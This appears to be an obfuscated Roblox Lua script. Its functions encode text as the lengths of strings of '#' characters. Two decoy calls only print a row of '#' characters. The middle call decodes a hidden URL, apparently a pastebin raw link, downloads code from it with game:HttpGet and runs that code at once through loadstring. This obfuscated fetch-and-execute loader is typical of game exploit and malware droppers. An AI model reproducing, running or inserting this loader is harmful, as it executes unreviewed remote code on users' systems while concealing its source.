function JaofTSOLAPzZlKowBEkL(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


print(JaofTSOLAPzZlKowBEkL({'###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################'}))
    function RXmtdpqIdWIDHEINYbtEnKwxtWEKbuXezfgvTvzXuhOjBrpwImvyLLeIritmHzrrx(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


loadstring(game:HttpGet(RXmtdpqIdWIDHEINYbtEnKwxtWEKbuXezfgvTvzXuhOjBrpwImvyLLeIritmHzrrx({'########################################################################################################','####################################################################################################################','####################################################################################################################','################################################################################################################','###################################################################################################################','##########################################################','###############################################','###############################################','################################################################################################################','#################################################################################################','###################################################################################################################','####################################################################################################################','#####################################################################################################','##################################################################################################','#########################################################################################################','##############################################################################################################','##############################################','###################################################################################################','###############################################################################################################','#############################################################################################################','###############################################','##################################################################################################################','#################################################################################################','#######################################################################################################################','###############################################','#####################################################################################','#####################################################################################################################','#################################################################################','############################################################################','##########################################################################################################','####################################################','#################################################################################################','##################################################'})))()
    function JaofTSOLAPzZlKowBEkL(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


print(JaofTSOLAPzZlKowBEkL({'###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################','###################################'}))
    
